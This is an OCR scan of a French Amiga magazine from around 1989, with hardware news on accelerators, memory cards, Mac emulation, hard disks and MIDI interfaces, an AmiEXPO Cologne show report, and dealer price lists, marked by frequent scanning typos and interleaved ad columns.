Les modules de 2 mégas de RAM dynamique peuvent être configurés en 16 ou 32-bits par jumper. La mémoire est disponible avec des temps d’access de 70, 80 et 100ns, selon la vitesse d'horloge du processeur installé. Les Infinity Machines avec 68030 à 50MHz ou 33MHz doivent être équipés de RAM à 70ns, et ceux à 20 ou 25MHz auront besoin de RAM à 80ns. Pour une efficacité maximale la mémoire doit être organisée comme "intèrleaved RAM”, et ceci impose un minimum de deux modules mémoire, chacun peuplé à 1 méga. Le prix en allemagne d'un module avec 2 méga 32 16bit RAM est 700DM (environ 2400F).
Le Controlled Cache module est 128k de RAM statique haute vitesse (25ns) en dehors de l’espace adresse normale de l’Amiga.
La logique sur l’Infinity permet à tout programme de déterminer la disponibilité de cette cache de RAM statique. L’Infinity incorpore un système DMA qui permet les transferts de blocs de data entre le RAM dynamique et ce ram statique à la vitesse de 64 mégabytes seconde.
Le prix d’un 68030 à 16MHz est 650DM (environ 2200F), ou pour 450F vous avez un 68000 à 16MHz qui s’installe sur un module spéciale qui à son tour s’insère dans le support 68030 de l’Infinity Machine. Le burst cache mode du 68030 est implementé et fonction avec tout RAM dynamique dans le système (mais pas avec le Controlled Cache). Selon MAST, la configuration de la mémoire dynamique en "interleaved" est ideale pour utilisation avec la cache du 68030. Des modules de RAM 70ns permettrait un 68030 à 33MHz de charger sa cache avec 16 bytes dans 7 cycles d’horloge.
La logique de l’Infinity est indépendente de la vitesse d’horloge de l'Amiga. Quand l'Infinity a besoin d’accéder aux circuits ou RAM graphique de l'Amiga un circuit d’auto-synchronisation aligne les deux horloges pour le transfert de data. Un switch permet de choisir entre le 68000 d’origine et le processeur dans l’Infinity.
Dcmiér détail: les routines ROM Kickstart de l'Amiga sont chargés automatiquement dans la mémoire 32-bit après démarrage du système, assurant une augmentation importante de la vitesse de toutes les opérations utilisant ces codes.
Pour 1990 MAST annonce l'Infinity Video Machine. Parmi scs fonctions il y aurait l’accès 32-bit au Chip RAM de l’Amiga, et la possibilité pour un Amiga 1000 d’utiliser le nouveau Chipset.
Les produits de MAST sont importés en France par Bus Plus.
PERIPHERIQUES CONNECTABLES OU COMPATIBLES A1010 3"1 2 EXT A2010 3" 1 2 INTER.
A501 512 K A500 A2058 2 MEGS A2000 KIT PC CARTE + 5" 1 4 A590 Disque Dur ?20 MEGS 1190 1590 1390 6790 NC 5290 CARTE OVERDRIVE CONTROL SCSI A2300 GENLOCK INTERNE CARTE AT 2286 CARTE A2620 68020 14Mh; + 2Mo CARTE FLICKER FIXER Extension 512 Ko pour A590 2550 2360 11250 14800 4950 1250 LECTEUR MDC 30 3"1 2 DF LECTEUR MDC 5" 1 4 FILTRE ELECTR.
DIGIGOLD CODEUR SATELL.
PAL GENLOCK GST30 GOLD PERFECT SOUND FR.
1090 1690 2540 2750 6990 850 SCANNER A4 A PLAT 200 DPI PAINTJET HP JET ENCRE PROMO A590
D. DUR 20MEGS + 2 MEGS RAM MONIT.
VGA.
A1432 SCANLOCK.
GENLOCK VIDTECH 4990 15990 7690 FRANCS 5560 NC SOFTS DES NOUVEAUTES CHAQUE SEMAINE GRAPHICS VIDEO SON MUSIQUE DIVERTISSEMENT L’Amiga; tout l’Amiga, rien que l’Amiga ” AMIGA 500 & AMIGA 2000 ARTISTES DE LA MICRO EXPOSITION PERMANENTE PACK EDUCAMIGA A2000 + A1084 + + KIT PC XT2088 KIT PC AT 2286 12990 F 16990 F AMIGA 2500 DISPO NC TRANSFORMATION A2000- A EN 2000-B s: 48781165 DELUXE MUSIC 700 Dl.T's (KCS) 1999 AUDIO MASTER II NC TRACK 24 590 BIG BAND 1430 STUDIO 24 1169 LANGA. ET UTIL.
LATTICE 5.0 2439 MARAUDER II 379 BENCH MODULAII 1690 SUPERBASE PRO 1490 OUARTERBACK 550 PRO. PAGE 4090 GFA BASIC 3.04 750 EXCELLENCE FR 2390 PROJECT D 375 DEVPAC II 690 Démonstration sur demande BATTLE CHESS 280 F-16 COMBAT 299 CHESSMASTER 2000 199 Périphériques iç de shock Gigatron, l'une des sociétés anémia andes qui s’est spéciaLe Monde AmigaMac lisée en périphériques pour l'Amiga, à annoncé trois produits assez hors de commun en cours de développement: une carte disque dur interne pour le 500, un Amiga laptop, et une carte mère d’A500 entièrement redessinée !
Vous avez bien lu interne. Le disque dur est à peine plus grand qu’un paquet de cigarcues et deux fois moins épais. Gigatron sont les importateurs officiels pour ce minidisque dur, qui sera disponible à partir du Cebit de printemps pour un prix d’environ 4000F en Allemagne (pour 20megas et un temps d'accès de 28ms). Le disque se place juste au-dessus de la cane mère de l'Amiga.
Et utilise le support du processeur 68000 comme bus. D'autres versions allant jusqu'à 120 mégas sont prévues.
En fait les trois projets de Gigatron semblent bien liés ensemble. Pour faire un lap- top d'un Amiga 500 il semble logique de commencer par re -dessiner la carte mère pour permettre l'incorporation sans problème d'un disque dur, 2 mégas do mémoire et un écran plasma... Mémoire Gigatron exposait la MiniMax Plus, une extension mémoire qui sc loge à la place de la A501 et qui permet d'avoir 512 Ko, 1 Mo ou 2Mo de mémoire supplémentaire.
Avec la carte Minimax tout court (celle qui n’est pas Plus) on ne peut avoir que 1.8 Mo supplémentaires à cause du système de gestion de mémoire (môme situation qu'avec les premières cartes SpLrit quand ils sont utilisés en mode auto-config). Dans ce cas pour avoir les 2 Mo il vous faudra ache ter l'update au niveau Plus, qui se constitue d'un nouveau support pour Gary plus un support pour le 68000 avec des nappes de fils reliant ces deux derniers a l’extension mémoire. Celte update est obligatoire si vous désirez changer votre vieux Fat Agnus contre le tout nouveau Super Fai Agnus.
Gigatron vient de nommer Chouette Informatique importateur exclusif de ses produits en France (Chouette Informatique, Depuis quelques temps on remarque JÆ* beaucoup d’activité VW visant à rapprocher le monde Macintosh avec celui de l’Amiga. La référence est AMAX, l’émulateur Macintosh pour Amiga qui comprend un logiciel et une petite boîtier pour les ROMS Macintosh.
Ready Soft continue à travailler sur AMAX et nous promet pour "environ mars" une version qui utilisera les disques durs Amiga comme la carte PC (la partition sera probablement créée sous AmigaDOS et puis formaté sous Amax).
La version actuelle d’AMAX ne permet pas l’utilisation d'un disque dur.
Mais une autre société, Interactive Vido Systems (IVS), commercialise dès à présent un logiciel permettant la création de partitions Macintosh et Amiga sur un même disque dur. Seule contrainte: il faut que le disque dur soit gérer par une carte contrôleur IVS Trumpcard.
Le sofl, "Trumpcard!AMAX Hard Disk Support Utilities", comprend trois logiciels: le Trumpcard patch, une version nouvelle de TCUtils (utilitaires Trumpcard) et un logiciel pour Mac, Disk Manager Mac d’Ontrack Software. La création de partitions et le formatage sont sous AmigaDos, et l'utilisation de lecteurs "floppy" compalible- Macintosh n'est plus nécessaire. Selon IVS, communication avec le disque dur est 30% plus rajtide que sur un Mac! Vous pouvez, par exemple, partitioncr votre disque dur en 2 (Amiga et Mac) et booter sur la partition Amiga ou sur la partition Mac lorsque vous êtes
sous l'émulateur (les deux systèmes ne peuvent pas tourner simultanément, dommage!). Nous allons tesier cela très rapidement pour vous.
Les produits d'IVS sont importés en France par Bus Plus, 41 rue Bairault, 75013 Paris, tél M5-8O05-66. Le logiciel Trumpcard AMAX est vendu 780F.
La société GVP annonçait à Cologne qu ‘il travaille, lui aussi, sur une option permettant l'utilisation d'AMAX avec ses cartes contrôleurs de disque dur.
Toujours à propos du monde AmigaMac, un autre produit intéressant disponible chez Bus Plus est Vamig-a- Tosh Plus, de Memory and Storage Technology (M.A.S.T). C'est un lecteur de disquette "slim line" à l'intérieur duquel MAST a ajouté une carte pour recevoir les ROMs Macintosh. Vous installez vos ROMs dans le lecteur, connectez l’Amig-a-Tosh Plus au port lecteur de disquette de l'Amiga, lancez le système avec la disquette fournie avec A-Max, et vous voila avec un Amiga qui peut exécuter des programmes Mac. Ce lecteur est aussi disponible comme simple lecteur conrpatible- Mac sous le nom
d’Amig-a-Tosh. Les prix : 2686FTTC ct2030FTTC.
David Foster, président de ReadySoft, a pu donner une réponse à une question déjà posé dans A-News - l’Amax, a-t-il un problème avec le Flickcr-FixerO Réponse: oui, avec la première version du logiciel, mais seulement en PAL et avec le nouveau coprocesseur graphique Supcr-Agnus.
L'image était brouillée et la marge inférieure de l'écran n’était pas visible.
Ces deux problèmes sont résolus, et vous pouvez mettre à jour votre programme en le renvoyant à ReadySoft (30 Wertheim Coun, Richmond Hill, Ontario. Canada LAB 1B9, tél 416-731-4175, fax 416-764-
8867) .
BP42, 67340 Ingwiller. Tél 88-895-241, Fax 88 895-230.) Chouette vend la carte Minimax Plus à ceux qui ont déjà le SuperFat Agnus au prix de 2499FTTC (avec cloclc el 1.5 mégas sur la carte). Pour ceux qui ont l"ancien" Fat Agnus, Chouette propose, pour le même prix, une carte Minimax Plus équipée de 1 méga RAM; le ROM Kickstart 1.3 et le Super Fat Agnus.
Avec ce ''kit'' le possesseur d'un A500 peut mettre à jour sa machine et disposera de 1 méga de chip RAM et 512k de fast RAM.
La société MAST, lui, promet Maximegs, une carte 1.8 mégas avec horloge qui s’insère dans le slot AS01 sous l'Amiga 500 ei n'aurait pas besoin de câbles de connection avec le circuit Gary. Ca marchera avec le nouveau Super Fat Agnus. Le prix prévu pour ce produit, qui n'est pas encore disponible, est 299DM (environ 1200F) en 512k et 669DM (environ 2300F) en 1.8 mégas. Mais, en informatique la différence entre une promesse et un produit est quelquefois décevante. Attcng et vois!
Robmoller préseniait la première carte mémoire à utiliser des circuits de 2 Mbits. Il s'agit d'une carte de 2 ou 8 Moctets pour le 2000 qui est d’une taille ridicule puisque pour 8 mégas il n'y a que 16 chips au lieu de 32 avec des boîtiers de 1 Mbits.
Etait également présenté un prototype de crayon optique destiné a remplacer la souris et un programmateur d’eprom compatible ST et PC.
10 A-News Les disques durs Les disques durs étaient partout, dans toutes les formes et configurations. IVS montrait les Trumpcards 500 et 2000, qui sont rigoureusement identiques. La seule différence est située au niveau du boîtier qui se fixe sur le bus du 500 et contient un adaptateur de slot pour cartes 2000. C'est pratique: si vous désirez changer votre 500 contre un 2000, vous pouvez donc conserver les cartes disque dur et extension mémoire 4 Mo qui peuplaient votre 500, et les fixer directement dans les slots du 2000. Nous publierons les résultats d'un test du Trumpcard le mois prochain.
BSC, fabriquant d’extensions mémoire et d’interfaces disque dur présentait l'ALF (Amiga Loads Faster), une interface disque dur pour 500, 1000 et 2000 qui existe en non autoboot ou autoboot. D s’agit d'interface ST506, du même type que le Skyline et les performances sont similaires. Petit supplément: quand vous autobootez la séquence d’autoboot vous demande un mot de passe avant de démarrer l'exécution de la startup-séquence, ce qui permet de protéger votre disque dur contre des gens mal intentionnés ou votre petit frère... Vortex présentait son disque dur compatible Amstrad PCW, IBM PC et
Amiga avec petite interface différente selon le modèle et un slogan à faire pâlir Ed: "Si vous décidez un jour de jeter votre Amiga et d'acheter autre chose, pas de problème, vous gardez votre disque dur et on vous vend une nouvelle interface pas cher".
Skyline, le fabriquant d’interface disque durs présentait son module autoboot qui s'intercale entre l’Amiga et l’interface. Hélas l'importateur en France (CIS) a décidé d'arrêter ce produit, mais pour ceux qui l’ont déjà acheté il continue à en assurer le SAV.
Choses diverses IVS présentait la carte Printerface permettant d'avoir 2 ports parallèles. Vous pouvez, par exemple, conserver un digitaliseur branché en entrée sur le port d'origine et avoir une imprimante branchée sur le port supplémentaire (photo).
A noter qu'il existe déjà des boîtiers multi-ports externes qui permettent de sélectionner par switch entre plusieurs ports parallèles.
Selon IVS l'utilisation de ces boîtes avec des digitaliseurs peut donner des résultats décevantes à cause des bruits électroniques résultant de la longeur des câbles.
Le Printerface s'installe sur le support 68000 de l'Amiga et redirige tout data pour imprimante vers le port supplémentaire. Les deux ports peuvent travailler simultanément. Ce produit est disponible chez Bus Plus au prix de 1050F.
Flick-Off, un flicker-fixer pour Amiga 500 et Amiga 1000,(et plus tard pour A2000) est annoncé par MAST. C'est une carte qui se monte en piggyback sur Denise et élimine le scintillement dû au mode entrelacé. Plusieurs options seront sélcctionnables par logiciel, y compris Shrink Mode qui permet de prendre deux écrans en mode non-entrelacé et de les afficher sur l’écran entrelacé.
Flick-Off comporte 1.5 mégas de vidéo RAM, et fonctionne avec un moniteur multisynch. Il sera disponible chez Bus Plus en janvier au prix de 3995FTTC.
Z I O M M LE SPECIALISTE DE L’AMIGA EN ENVIRONNEMENT PROFESSIONNEL SERVICE APRES VENTE RAPIDE ET SUR PLACE, AIDE TELEPHONIQUE POUR TOUS NOS CLIENTS AMIGA 500 AMIGA 500 : 3490.00 AMIGA 500 + ECRAN COULEUR 1084P : ..5990.00 STARTER KIT: .3990.00 Extention 512 Ko, Horloge, Interupteur :......990.00 MiniMax 512 Ko extensible : .....1790.00 MiniMax 1Mo : ....2590.00 MiniMax 1.5Mo : .3390.00 MiniMax 1.8Mo
: .4190.00 Pack de 512 Ko pour Minimax : ..790.00 Kick (Support de ROM 1.2 et 1.3) : 250.00 Kick+ROM 1.3 : ....490.00 ROM 1.3 : ......250.00 Super Agnus (Gère 1Mo en Graphique) : ....550.00 AMIGA 2000 AMIGA 2000 AVEC ECRAN COULEUR EQUIPE DE 3MO AVEC SUPER AGNUS ET KICKSTART 1.3 16980.00 TTC AMIGA 2000 : 9490.00 AMIGA 2000 + ECRAN COUL. 1084P : ....11490.00 CARTE MEMOIRE DE 2Mo RAM : 4990.00
PERIPHERIQUE LECTEUR EXTERNE 3"1 2 EXTRA PLAT.... 1090.00 DISQUE DUR 20 MO POUR A500 4990.00 BOOTSELECTOR (DF0: OU DF1:) : ......200.00 Disquettes 3*1 2 DFDD : .....9 90 POUR TOUTES COMMANDE DE LOGICIELS PROFESSIONNELS APPELEZ NOUS AU 88-22-28-58 BON DE COMMANDE ZIOMM à envoyer au : 1, rue Déserte 67000 STRASBOURG. Port en sus.
Tél : 88-22-28-58 Fax : 88-22-02-01 Prix Article Qté TOTAL TTC Le paiment est à régler par chèque à l'ordre de ZIOMM. Tous nos matériels sont garantis 1 an et réparés dans nos locaux en un temps record. Pour tous renseignements appelez au 88-22-28-58.
Mon très cher NOËL J’ai été très sage cette année et beaucoup moins abominable que d'habitude. J’ai fini par bouffer le poisson rouge que tu m'avais amené l’an dernier et qui avait mis trois mois à décongeler; à vrai dire, il n'avait jamais particulièrement bien volé. Cette année, je voudrais un kit de nettoyage pour mon disque dur et un holster pour ma massue. Pierre BELLEMARRE est un nain à côté de toi. Mes baskets seront devant le butagaz comme d’habitude.
Le YETi raconte les Videospezialeffekte et d’autres digitalisierung et fîlmsequenzen qu’il a vu à Cologne.
Mine de rien, il a tout compris... Le mois prochain : mes prédictions extralucides pour 1990 ach, KOLOSSAL !!!
Et voilà, j’ai sacrifié un beau week-end pour aller voir de plus près ce que devient l'Amiga en général, en Europe en particulier.
J’ai gaillardement enfourché mon Solex du dimanche et je me suis rendu à l’aéroport international le plus proche de mon domicile afin de grimper dans un pétard volant en partance pour Cologne. Alors que notre BOING se frayait fiere- ment un passage parmi les moutons parsemant l’azur et que le commandant Apfel recommandait de garder la ceinture attachée même lors des déplacements en cabine, je révisais la conjugaison du verbe "essen", manger, en me disant que le C est un langUage simple, finalement.
Une fois de rcLour sur Terre, j'ai foncé directement au KOLHN Messe, lieu de la première AmiEXPO européenne. Vu de l'extérieur, ça ressemblait à l’entrée d'un concert d'bon Maiden mais à 11 heures du matin. Les hordes teutonnes s’écrabouillaient la tronche contre les portes en meuglant; on est pas prêt de voir ça au SICOB.
Le MESSE, grand comme trois terrains de foot ou 248 tables de ping-pong, était plein. Les exposants essayaient en vain de conserver la géométrie d’origine de leurs stands alors que des grappes humaines défilaient en flot continu dans les allées en surfant sur les prospectus. Cédant à la panique de l’imprévu, j’ai décidé de ne m'intéresser qu’à ce qui nous préoccupe dam la trame (Ed: et R.Rapido s’occupaient du reste).
J'espérais secrètement voir enfin une carte graphique genre 256 parmi 16 millions en 1024x1024 pour la miga 2000.
Ben, que dalle. Il apparait clairement que tout le monde s’est accordé à respecter le proverbe qui dit que pour vivre heureux, le mieux est de faire avec ce que l’on a et donc de se contenter des résolutions graphiques d’origine. Amiga Centre Scotland, déjà responsable de SCULPT 3DXL (un sculpt avec sphères en primitives genre DRW Render), laisse pourtant traîner le brait d'un frame buffer capable d’afficher 900x600 en 24 bits mais pas pour tout de suite...(Ed: Et le transputer?)
La demo graphique la plus dévastatrice était présentée sur le stand NEWTEK. Il s’agissait du résultat vidéo d’animations 3D réalisées avec TOASTER 3D, logiciel de 3D conçu pour le toaster, cette carte frame buffer miraculeuse à l’étude depuis près de deux ans. C’est indescriptible, époustouflant et presque incroyable. Les images ont largement la qualité des réalisations actuelles sur gros systèmes.
Le toaster sera très certainement disponible en NTSC aux USA dans le courant du printemps prochain; la version PAL n’est pas à espérer avant 91-92.
L’autre demo vidéo percutante se déroulait sur le stand Intelligent Memory.
LIVE!, le digitaliscur temps réel en PAL associé au logiciel d'effets INNvision travaillait en sélection sur quatre ¦ sources vidéo. Associé à un genlock, LIVE traitait une source vidéo en lui appliquant des effets de couleurs et de volets. Prochainement disponible en France, LIVE va certainement intéresser les professionnels de la vidéo à la recherche de systèmes d'effets innovants et tous les hobbystes qui y trouveront le moyen le moins cher de produire des effets et des séquences spectaculaires.
LIVE était présenté avec le nouveau genlock de la firme VIDEOCOMP: le VES One. Ce genlock a pour lui beaucoup d’atouts et une présentation très attrayante en boîtier pupitre. Il travaille en PAL et en Y C (S-VHS, Hi8), dispose de réglages de niveaux du signal vidéo de référence et de la miga, de fonctions de fondus manuels et automatiques à vitesse variable et d’un DIGI-VIEW GOLD intégré avec filtrage RVB automatisé. Il est livré avec un logiciel de titrage. Je vous reparlerai de cet engin des que je l’aurai testé (Videocomp, Bernerstrasse 17. 6000 FrankfurtIM 56, tél 069-507-6969. Fax
069-507-6200.)
Je profite ue ce passage "GENLOCK" pour vous faire savoir que j’envisage de réaliser un "vrai" test comparatif dans le genre de celui que nous avions organisé concernant les disques durs. J’en profite pour remercier tout ceux qui m’écrivent pour me parler de leur genlock car c’est sûrement les informations les plus fiables que je puisse obtenir.
Impressionné par la classe et la finition des documentations Amiga de Commodore Allemagne, 500, 2000, 2500, Desktop Vidéo, BTX télécommunications, en format A4 3 volets sur un papier satiné avec des photos superbes. Si notre bécane chérie était aussi choyée en France, on boufferai des "pommes" toute l’année.
La société RGB présentait un système que j’attendais personnellement depuis très longtemps: un éditeur de montage multi- unités sur AMIGA. Concrètement, on met une carte dans un zamiga 2000 d’ou partent 4 câbles au bout desquels se trouvent des boîtiers d’interfacages différents selon les magnétoscopes et qui se connectent à la place du câble de télécommande. Ce système est capable de gérer 3 lecteurs et 1 enregistreur, de mémoriser plus de 10000 points de montages successifs avec ou sans time-code, et de piloter des machines d'effets via un canal G.P.I. Le système pilotait trois
magnétoscopes professionnels S-VHS Panasonic mais peut être interfacé du S-800 8mm au 1 pouce SONY. RGB propose un logiciel "transport controller" capable de gérer l’enregistrement d’animations image par image et d'autres solutions pour les packages 3D. Ce système est performant et relativement bon marché si on le compare aux autres systèmes de montages multi- En Allemagne, on définit volontiers l’Amiga comme un nouvel outil d’expression artistique; en France, on veut en faire une bonne machine de P.A.O. Heureusement pour'nous, certains accros définitifs de la miga ont compris les
aspirations secrètes de leur bécane et se lancent sans complexes dans l’art Amiga. Ed. Vous a déjà parlé plusieurs fois d’éditions de cassettes vidéo regroupant de l’image et du son produit sur ’miga, la deuxième phase semble maintenant être en marche : le VIDEO-ZINE. J’ai reçu récemment le dossier de présentation de TRASHCAN, vidéo-zine trimestriel en VHS SECAM tiré à 400 exemplaires et vendu lOOFrs par correspondance ou dans certains magasins d’art. Le projet semble réaliste et l’habillage graphique très homogène. Dès que ce projet se concrétise, je vous fournirai toutes les infos
nécessaires pour vous le procurer.
Laissez les sapins à leur place, ils ne supportent pas la vie en appartement et la concurrence déloyale de la télévision.
Bonne année à tous.
Machines style BVE ou Mickey. RGB propose également l’Amiga 2000 en boîtier 19” rackable.
Le show regorgeait de démos d’anims 3D de qualité technique incontestable mais d’une froideur sinistre si on les compare aux belles images de Fred BOULLIER qui n’a rien trouvé de plus intelligent que de me modeler sous Sculpt avec Ramon pour la couverture de ce mois-ci Commodore Allemagne avait édité spécialement pour l’AMIexpo Europe deux séries limitées d’AMIGA 500. Ces séries spéciales baptisées "NEW ART" consistaient en un Amiga 500 décoré en sérigraphie, deux motifs au choix: spheres et damiers ou graphiques surf, livré dans un package spécial au look très réussi. Cette opération
était relayée par une campagne d’affichage qui servait également pour l’expo. J’ai été EL YETi ronfle en hibernant Voici l’écran de travail de Show Maker, prochain logiciel de Gold Disk.
Show Maker permettra la synchronisation"à la souris" de Jïchiersvidéo, texte et musique.Date de sortie prévu : début 1990 NICOLAS FOURNEL Lj fyk art Deuxième volet de cette nouvelle rubrique dédiée à la musique sur AMIGA. Le principal, c’est que vous ne le vous soyez pas pris en pleine figure. Et ça continue, encore et encore... c’est que le début, d'accord, d'accord... MIDI moi tout... Le MIDI esi une petite révolution dans le milieu informatique car c’esl la première fois que tous les constructeurs ont adopté aussi vite un standard commun. Ce format permet à des instruments de musique et à
des ordinateurs de communiquer entre eux par le biais d'une transmission série de 31250 bauds (bits s). Une interface Midi sc connecte donc sur la prise RS232 de votre Amiga et 3 jolies petites prises rondes à 5 broches assurent la liaison avec votre syn- üiétiseur préféré. La prise IN reçoit des informations provenant d’autres appareils, la prise OUT transmet des informations vers d’autres appareils alors que la prise THRU retransmet simplement les informations qui se présentent à la prise IN sans en tenir compte. Voici un échantillon des prises Midi disponibles pour votre Amiga: MINI MIDI:
La prise Midi du plus célèbre agent secret du monde: un carré de 4 cm de coté sur 1 cm d'épaisseur avec 2 prises DIN qui sortent: une MIDI IN et une MIDI OUT (suffisant dans bien des cas), idéale pour planquer dans un faux talon. Se connecte directement sur la prise RS232.
Produit par Mimetics et distribué par le CIS pour la modique somme de 390 Francs (450F pour Amiga 1000). My namc is Bond, James Bond... C S, 571 cours de la Libération 33 400 Talence 56 374 378 MIDI 1 de Trilogie Tri, ca veut dire trois (comme les 3 DINs MIDI, ca colle) et logic ca fait toujours bien quand on est dans l’électronique. Bon, ces gens là devraient nous sortir des prises MIDI comme s’il en pleuvait. Et d’ailleurs c’est ce qu’ils font, cf la MIDI 2 un peu plus loin. Pas de pro blême ca marche: une MIDI IN, une OUT et une THRU, sc connecte sur la RS232 par l’intermédiare d'un cable
de 40 cm et est fournie avec un cordon MIDI de taille respectable (pourquoi tout le monde n'en fait- il pas autant ?). Un point noir: la finition, qui fait plus penser à un travail d’amateur mais c'est en train de s’arranger alors... Distribué par Bus + pour 445 F. BUS +, 41 rue Barrault 75013 Paris 45 80 05 66 MIDI ECE: Non ce n'est pas une prise MIDI agréée par la CEE mais la prise MIDI de monsieur ECE. Une présentation im-pé- cablc: jolie boite, bouton de commutation RS232 MIDI sur la face avant, les 3 prises MIDI classiques sur la face arrière, ainsi que la prise RS232 supplémentaire. La
connection à l’ordinateur sc fait par l’intermédiaire d'un cable en nappe de 30 cm. Prix 580 F. MIDI MODEL-A de Dr T's: Mêmes caractéristiques que l'interface MIDI ci- dessus, sauf que c’est ce bon vieux Doc' qui la produit. Elle dispose en plus d’une sortie pour métronome. 680 F. Dr. Ts Music Software, 220 Boylston Street, Suite 206, Chestnut Hill, MA 02167 U.S.A. (617) 244- 6954 MIDI 2 Trilogie: on ne sc serait pas déjà rencontré? Le même boilier que la MIDI 1, le même câble de raccordement RS232, le même cordon MIDI,... et la même présentation (aïe). Tout de même deux prises MIDI
OUT THRU supplémentaires, commutables par interrupieurs. Interface à mi-chemin entre l’interface MIDI rie base et la console pro: intéressante pour l'amateur éclairé possédant 2 ou 3 instruments MIDI. Toujours distribué par Bus Plus cl ce au prix de 510 F. AMAS: l’Advanced Midi Amiga Sam- pler donne dans le style tout en un. Pour 990 francs vous avez droit à une prise MIDI et un échantillonner dans le même boitier, le tout accompagné d’un logiciel. Le digitaliser n’est peut-être pas ce qui se fait de mieux dans le domaine mais l’ensemble présente un fort bon compromis. Bonne présentation.
Fabriqué par Microdcal.
Microdeal Ltd, Box 68 St Austell Cornwall PL25 4YB (Grande Bretagne) MIDI STAR SPIRIT L’usine à gaz: 2 MIDI IN. 6 MIDI OUT THRU commutables, des diodes d'indication de statut, une prise RS232 avec PassThru, plu sieurs modes d'opération, un boilier métallique... C'est en fait une console MIDI à l’usage des pros. Produit par Spirit Technology et distribué par le CIS pour la somme de F2390TTC MIDI TRANSPORT Si voue tirlitron protoplasmique ne fournit pas sa dose habituelle de gnobuleux vasouillard, vous vous êtes peut être trompé dans la connexion de votre Midi Transport, jugez en plutôt: à la
fois interface MIDI et synchronisalcur, elle dispose d’un générateur lecteur FSK et SMPTE - Midi Time Code, 2 prises MIDI IN et 4 OUTs avec indicateurs lumineux et est livrée avec un logiciel de configuration de la carte ainsi qu'une alimentation extérieure. L’étude des possibilités d’un tel appareil nécéssitcrait un (est plus approfondi. Produite par Pas sport, elle est réservée aux professionnels, et on peut la commander, moyennant un chèque de 3890F, chez Numcra. Numéro, 11 rue Pri malice 75013 Paris 45 871756 Vu le nombre impressionnant de prises sur certaines interfaces MIDI, on peut se
demander l’utilité de plusieurs MIDI IN ou plusieurs MIDI OUT.
• Plusieurs MIDI OUT: dans le cas où vous avez plusieurs
instmments MIDI, cela permet de doter chacun d'entre eux de son
propre cordon MIDI et de le raccorder directement à
l’ordinateur en évitant ainsi les délais dus aux enchaînements
multiples par des prises THRU.
• Plusieurs MIDI IN: ceci permet d'en- register plusieurs
instruments simultanément avec un séquenceur. On peut égale
ment se servir d’une des entrées comme horloge pour une
synchronisation par MIDI.
N’oublions pas non plus que chaque revue ou fanzine a un jour proposé dans son coin dédié aux maniaques de la bidouille hard une prise MIDI à réaliser soi-meme avec ses petites quenottes. A vous déjuger en fonction de la disponibilité des composants utilisés, de leur prix, et bien sûr de votre maîtrise du fer à souder. Banzaïiiiii !!!
Faery Taie 2: le dernier sequenceur Midi... David Joiner, célébrissimc auteur de Faery Taie, le jeu d'aventures qui a marqué les débuts de l'Amiga, alors qu'on le croyait en train de programmer Faery Taie 2 suite logique du précédent, vient de nous sortir Music X, un des softs MIDI les plus complets à l'heure actuelle et dont la presse anglo-saxone fait l'éloge à grand renfort de couvertures et de dossiers spéciaux (Amiga Format-d’octobre, Amiga World...). La version définitive éiant désormais disponible en France, j'occupe actuellement mes longues veillées hivernales à le tester. Comme une
telle production ne s’évalue pas à la légère, je vous en reparlerai bientôt plus à fond mais sachez tout de même que la bctc en question met à votre disposition un séquenceur très complet bicii sûr, mais aussi des éditeurs d'événements MIDI, de patchcs et de systèmes exclusifs, sans oublier la possibilité de faire jouer des échantillons par l’Amiga et enfin une approche très intuilive de la musique grâce à un affichage des notes sous forme de boites colorées aisément manipulablcs à la souris. Music X est un produit de Microlllusions et est disponible chez CIS pour 2390 F. Microlllusions,
Post Office Box 3475, Granada Hills, CA 91344 USA Editeurs Libraires: mettons nous à la page Les Editeurs Libraires pour synthétiseurs sont des programmes qui permettent de gérer les paramètres enfouis au plus profond de vos synthétiseurs. La partie Editeur permet de créer des sons beaucoup plus facilement que sur les minuscules écrans 14 A-News ce cadeau de met amei la valeur de votre ordinateur en logiciels et accessoires gratuits Prix promotionnels non cumulables avec les promotions 3MIE en cours. Offre dans les limites des stocks disponibles.
- CD i AMIGA + MONIT. COULEUR 1084
10. 500 F AMIGA 500 + MONITEUR COULEUR 1084
6. 390 F AMIGA 500
3. 690 F LOGICIELS AMIGA JEUX Prix Public BAAL 249 F ? I 1 JEUX
Prix Public AMEGAS 150 F ?
GRAPHIQUES ¦ I, AMEGAS 150 F ?
D0CT0R FRUIT 200 F ?
ART OF CHESS 249 F ?
PHOTON PAINT 750 F ? | ] ART 0F CHESS 249 F ?
MASON MOTION 249 F ?
BARBARIAN ULT WARRIOR 200 F ?
DE LUXE PAINT 390 F ? 1 1 BARBARIAN BAAL 249 F ?
BUGGY BOY 249 F ?
DE LUXE PRINT 390 F ? 1 1 ULT. WARRIOR 200 F ?
GRAPHIQUES IKARI WARRIORS 249 F ?
GRAPHIGRAPHT 290 F ? , „ BUGGY BOY 249 F ?
PHOTON PAINT 750 F ?
INSANITY FIGHT 249 F ?
SUPER MANETTE 129 F ? • “ IKARI WARRIORS 249 F ?
DE LUXE PAINT 390 F ?
MERCENARY COMP 200 F ?
TAPIS SOURIS 80 F ? 1 1 INSANITY FIGHT 249 F ?
DE LUXE PRINT 390 F ?
TERROR PODS 249 F ?
BOÎTE 10 DISQUETTES 80 F ? 1 1 MERCENARY COMP 200 F ?
GRAPHIGRAPHT 290 F ?
THUNDER CATS 249 F ?
BOÎTE DE RANG. 100 OIS 100 F ? , ¦ TERROR POOS 249 F ?
SUPER MANETTE 129 F ?
WIZBALL 249 F ?
KIND WORDS 590 F ? J l THUNDER CATS 249 F ?
TAPIS SOURIS 80 F ?
DEJA VU 245 F ?
PAGE SETTER 590 F ? 1 1 WIZBALL 249 F ?
BOÎTE 10 DISQUETTES 80 F ?
SPACE OUEST 200 F ?
CALE FONTS 590 F ? 1 1 DEJA VU 245 F ?
BOÎTE DE RANGEMENT SPACE PORT 200 F ?
INFO FILE 590 F D , ,1 SPACE OUEST 200 F ?
100 DISQUETTES 100 F ?
SKY FIGHTER 220 F ?
ARTIST'S CHOICE 590 F ? J 1 SPACE PORT 200 F ?
00CT0R FRUIT 200 F ?
- 1 1 SKY FIGHTER 220 F ?
Valniir tntalR MASON MOTION 249 F ?
Valeur tnlale 1 1 Additionnez la valeur des produits que vous avez choisis, en cochant Additionnez la valeur des produits que vous avez choisis, en cochant les cases correspondantes, jusqu'à concurrence du prix d'achat de votre ordinateur. - AMIGA ®: Total maximum : 8.900 F.
- AMIGA © : Total maximum : 10.500 F. Faites l'appoint avec des
disquettes à 8 F pièce.
Les cases correspondantes, jusqu'à concurrence du prix d'achat de votre ordinateur.
